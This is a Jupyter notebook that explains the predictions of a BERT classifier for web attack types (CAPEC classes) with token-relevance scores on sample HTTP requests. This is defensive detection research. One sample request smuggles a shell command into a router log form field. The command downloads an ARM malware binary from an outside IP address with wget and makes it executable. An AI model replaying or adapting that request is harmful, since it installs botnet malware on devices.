In [20]:
from transformers import BertTokenizer
from BERT_explainability.modules.BERT.ExplanationGenerator import Generator
from BERT_explainability.modules.BERT.BertForSequenceClassification import BertForSequenceClassification
from transformers import BertTokenizer
from BERT_explainability.modules.BERT.ExplanationGenerator import Generator
from transformers import AutoTokenizer

from captum.attr import visualization
import torch
from transformers import AutoTokenizer, AutoModelForMaskedLM, AutoModel, DistilBertTokenizer
from transformers import BertTokenizer, BertModel

In [21]:
tokenizer = AutoTokenizer.from_pretrained('bert-base-uncased')
tokenizer1 = AutoTokenizer.from_pretrained('jackaduma/SecBERT')
tokenizer2 = AutoTokenizer.from_pretrained('jackaduma/SecRoBERTa')
tokenizer3 = DistilBertTokenizer.from_pretrained('distilbert-base-uncased', truncation=True, do_lower_case=True)

tokenizer_config.json: 100%|██████████| 28.0/28.0 [00:00<00:00, 27.4kB/s]
d:\miniconda\envs\datn\lib\site-packages\huggingface_hub\file_download.py:149: UserWarning: `huggingface_hub` cache-system uses symlinks by default to efficiently store duplicated files but your machine does not support them in C:\Users\Admin\.cache\huggingface\hub\models--distilbert-base-uncased. Caching files will still work but in a degraded version that might require more space on your disk. This warning can be disabled by setting the `HF_HUB_DISABLE_SYMLINKS_WARNING` environment variable. For more details, see https://huggingface.co/docs/huggingface_hub/how-to-cache#limitations.
To support symlinks on Windows, you either need to activate Developer Mode or to run Python as an administrator. In order to see activate developer mode, see this article: https://docs.microsoft.com/en-us/windows/apps/get-started/enable-your-device-for-development
  warnings.warn(message)
vocab.txt: 100%|██████████| 232k/232k [00:00<

In [2]:
model = BertForSequenceClassification.from_pretrained("bert-base-uncased", num_labels=6).to("cuda")
model.eval()

# initialize the explanations generator


classifications = ["000 - Normal", '126 - Path Traversal',
               '242 - Code Injection', '274 - HTTP Verb Tampering',
               '66 - SQL Injection', '88 - OS Command Injection']
explanations = Generator(model)

Some weights of BertForSequenceClassification were not initialized from the model checkpoint at bert-base-uncased and are newly initialized: ['bert.embeddings.position_ids', 'classifier.bias', 'classifier.weight']
You should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.


In [4]:
checkpoint = torch.load('D:\\Bert_ex\\Transformer-Explainability\\bert_models\\capec\\classifier\\BERT_CAPEC.pt')

In [5]:
dict = checkpoint['state_dict']


In [7]:
dict.keys()

odict_keys(['bert_model.embeddings.word_embeddings.weight', 'bert_model.embeddings.position_embeddings.weight', 'bert_model.embeddings.token_type_embeddings.weight', 'bert_model.embeddings.LayerNorm.weight', 'bert_model.embeddings.LayerNorm.bias', 'bert_model.encoder.layer.0.attention.self.query.weight', 'bert_model.encoder.layer.0.attention.self.query.bias', 'bert_model.encoder.layer.0.attention.self.key.weight', 'bert_model.encoder.layer.0.attention.self.key.bias', 'bert_model.encoder.layer.0.attention.self.value.weight', 'bert_model.encoder.layer.0.attention.self.value.bias', 'bert_model.encoder.layer.0.attention.output.dense.weight', 'bert_model.encoder.layer.0.attention.output.dense.bias', 'bert_model.encoder.layer.0.attention.output.LayerNorm.weight', 'bert_model.encoder.layer.0.attention.output.LayerNorm.bias', 'bert_model.encoder.layer.0.intermediate.dense.weight', 'bert_model.encoder.layer.0.intermediate.dense.bias', 'bert_model.encoder.layer.0.output.dense.weight', 'bert_mode

In [8]:
dict1 = dict.copy()
for name in dict.keys():
  name_new = name.replace('bert_model', 'bert')
  dict1[name_new] = dict[name]
  del dict1[name]

In [9]:
dict2 = model.state_dict()
dict2["bert.embeddings.position_ids"]

tensor([[  0,   1,   2,   3,   4,   5,   6,   7,   8,   9,  10,  11,  12,  13,
          14,  15,  16,  17,  18,  19,  20,  21,  22,  23,  24,  25,  26,  27,
          28,  29,  30,  31,  32,  33,  34,  35,  36,  37,  38,  39,  40,  41,
          42,  43,  44,  45,  46,  47,  48,  49,  50,  51,  52,  53,  54,  55,
          56,  57,  58,  59,  60,  61,  62,  63,  64,  65,  66,  67,  68,  69,
          70,  71,  72,  73,  74,  75,  76,  77,  78,  79,  80,  81,  82,  83,
          84,  85,  86,  87,  88,  89,  90,  91,  92,  93,  94,  95,  96,  97,
          98,  99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111,
         112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125,
         126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139,
         140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153,
         154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167,
         168, 169, 170, 171, 172, 173, 174, 175, 176

In [10]:
dict1["bert.embeddings.position_embeddings.weight"] = dict["bert_model.embeddings.position_embeddings.weight"]
dict1["bert.embeddings.word_embeddings.weight"] = dict["bert_model.embeddings.word_embeddings.weight"]
dict1["classifier.weight"] = dict["linear.weight"]
dict1["classifier.bias"] = dict["linear.bias"]
dict1["bert.embeddings.position_ids"] = dict2["bert.embeddings.position_ids"]

In [11]:
model.load_state_dict(dict1)

<All keys matched successfully>

In [22]:
encoding = tokenizer(text_batch, return_tensors='pt')
encoding1 = tokenizer1(text_batch, return_tensors='pt')
encoding2 = tokenizer2(text_batch, return_tensors='pt')
encoding3 = tokenizer3(text_batch, return_tensors='pt')
input_ids = encoding['input_ids'].to("cuda")
input_ids1 = encoding1['input_ids'].to("cuda")
input_ids2 = encoding2['input_ids'].to("cuda")
input_ids3 = encoding3['input_ids'].to("cuda")

In [24]:
t = tokenizer.convert_ids_to_tokens(input_ids[0])
t1 = tokenizer1.convert_ids_to_tokens(input_ids1[0])
t2 = tokenizer2.convert_ids_to_tokens(input_ids2[0])
t3 = tokenizer3.convert_ids_to_tokens(input_ids3[0])
print(t)
print(t1)
print(t2)
print(t3)

['[CLS]', 'get', '/', 'blog', '/', 'w', '##p', '-', 'log', '##in', '.', 'php', '?', 'action', '=', 'lost', '##pass', '##word', '%', '252', '##6', '##za', '##p', '%', '253', '##d', '##za', '##pro', '##xy', '&', 'red', '##ire', '##ct', '_', 'to', '=', '%', '252', '##6', '##za', '##p', '%', '253', '##d', '##za', '##pro', '##xy', '&', 'user', '_', 'log', '##in', '=', '%', '252', '##6', '##za', '##p', '%', '253', '##d', '##za', '##pro', '##xy', '&', 'w', '##p', '-', 'submit', '=', 'get', '%', '20', '##ne', '##w', '%', '20', '##pass', '##word', '%', '252', '##6', '##za', '##p', '%', '253', '##d', '##za', '##pro', '##xy', '[SEP]']
['[CLS]', 'get', '/', 'blog', '/', 'wp', '-', 'login', '.', 'php', '?', 'action', '=', 'lostpassword', '%', '2526', '##zap', '%', '253', '##d', '##zap', '##roxy', '&', 'redirect', '_', 'to', '=', '%', '2526', '##zap', '%', '253', '##d', '##zap', '##roxy', '&', 'user', '_', 'login', '=', '%', '2526', '##zap', '%', '253', '##d', '##zap', '##roxy', '&', 'wp', '-', 'sub

In [12]:
text_batch = ["GET /blog/wp-login.php?action=lostpassword%2526zap%253Dzaproxy&redirect_to=%2526zap%253Dzaproxy&user_login=%2526zap%253Dzaproxy&wp-submit=Get%20New%20Password%2526zap%253Dzaproxy"]
encoding = tokenizer(text_batch, return_tensors='pt')
input_ids = encoding['input_ids'].to("cuda")
attention_mask = encoding['attention_mask'].to("cuda")
token_type_ids = encoding['token_type_ids'].to("cuda")

# true class is positive - 1
true_class = 1

# generate an explanation for the input
expl = explanations.generate_LRP(input_ids=input_ids, attention_mask=attention_mask, start_layer=0)[0]
# normalize scores
expl = (expl - expl.min()) / (expl.max() - expl.min())

# get the model classification
output = torch.nn.functional.softmax(model(input_ids=input_ids, attention_mask=attention_mask)[0], dim=-1)
classification = output.argmax(dim=-1).item()
# get class name
class_name = classifications[classification]
print(class_name)
# if the classification is negative, higher explanation scores are more negative
# flip for visualization
if class_name != "000 - Normal":
  expl *= (-1)

tokens = tokenizer.convert_ids_to_tokens(input_ids.flatten())
print([(tokens[i], expl[i].item()) for i in range(len(tokens))])
vis_data_records = [visualization.VisualizationDataRecord(
                                expl,
                                output[0][classification],
                                classification,
                                true_class,
                                true_class,
                                1,
                                tokens,
                                1)]
visualization.visualize_text(vis_data_records)


d:\miniconda\envs\datn\lib\site-packages\transformers\modeling_utils.py:977: FutureWarning: The `device` argument is deprecated and will be removed in v5 of Transformers.
  warnings.warn(


126 - Path Traversal
[('[CLS]', -0.0), ('get', -1.0), ('/', -0.0926753431558609), ('blog', -0.01586337387561798), ('/', -0.049717243760824203), ('w', -0.0018041124567389488), ('##p', -0.0013735332759097219), ('-', -0.004921901971101761), ('log', -0.003932061139494181), ('##in', -0.003544826293364167), ('.', -0.010892060585319996), ('php', -0.019444167613983154), ('?', -0.0299976896494627), ('action', -0.015395154245197773), ('=', -0.05122113227844238), ('lost', -0.013952771201729774), ('##pass', -0.03364545851945877), ('##word', -0.0315619595348835), ('%', -0.0553058385848999), ('252', -0.10358541458845139), ('##6', -0.030691204592585564), ('##za', -0.01072787120938301), ('##p', -0.010937563143670559), ('%', -0.06633645296096802), ('253', -0.025578226894140244), ('##d', -0.008205646649003029), ('##za', -0.006443565711379051), ('##pro', -0.007506155408918858), ('##xy', -0.025898706167936325), ('&', -0.020961010828614235), ('red', -0.0033753730822354555), ('##ire', -0.004277429077774286)

d:\miniconda\envs\datn\lib\site-packages\transformers\modeling_utils.py:977: FutureWarning: The `device` argument is deprecated and will be removed in v5 of Transformers.
  warnings.warn(


In [14]:
text_batch = ["POST /cgi-bin/ViewLog.asp  remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7;chmod+777+Meth"]
encoding = tokenizer(text_batch, return_tensors='pt')
input_ids = encoding['input_ids'].to("cuda")
attention_mask = encoding['attention_mask'].to("cuda")
token_type_ids = encoding['token_type_ids'].to("cuda")

# true class is positive - 1
true_class = 1

# generate an explanation for the input
expl = explanations.generate_LRP(input_ids=input_ids, attention_mask=attention_mask, start_layer=0)[0]
# normalize scores
expl = (expl - expl.min()) / (expl.max() - expl.min())

# get the model classification
output = torch.nn.functional.softmax(model(input_ids=input_ids, attention_mask=attention_mask)[0], dim=-1)
classification = output.argmax(dim=-1).item()
# get class name
class_name = classifications[classification]
print(class_name)
# if the classification is negative, higher explanation scores are more negative
# flip for visualization
if class_name == "272 - Protocol Manipulation":
  expl *= (-1)

tokens = tokenizer.convert_ids_to_tokens(input_ids.flatten())
print([(tokens[i], expl[i].item()) for i in range(len(tokens))])
vis_data_records = [visualization.VisualizationDataRecord(
                                expl,
                                output[0][classification],
                                classification,
                                true_class,
                                true_class,
                                1,
                                tokens,
                                1)]
visualization.visualize_text(vis_data_records)


66 - SQL Injection
[('[CLS]', 0.0), ('post', 0.0049610501155257225), ('/', 0.0326789915561676), ('cgi', 0.016313230618834496), ('-', 0.022789515554904938), ('bin', 0.0015560470055788755), ('/', 0.009821903891861439), ('view', 0.0014764299849048257), ('##log', 0.003533927258104086), ('.', 0.028917063027620316), ('asp', 0.005795755423605442), ('remote', 0.0015421322314068675), ('_', 0.005872561130672693), ('submit', 9.452100493945181e-05), ('_', 0.0035861770156770945), ('flag', 0.0006303424597717822), ('=', 0.006571750156581402), ('1', 0.003091587917879224), ('&', 0.006537690758705139), ('remote', 0.0003858654235955328), ('_', 0.003698438173159957), ('syslog', 0.0008474307251162827), ('_', 0.0034825506154447794), ('flag', 0.0), ('=', 0.00412076385691762), ('1', 0.0026821328792721033), ('&', 0.004178994335234165), ('remote', 0.0005513280048035085), ('##sys', 0.0011589769273996353), ('##logs', 0.001441573491320014), ('##upport', 0.0006265139090828598), ('##ed', 0.00010249739716527984), ('=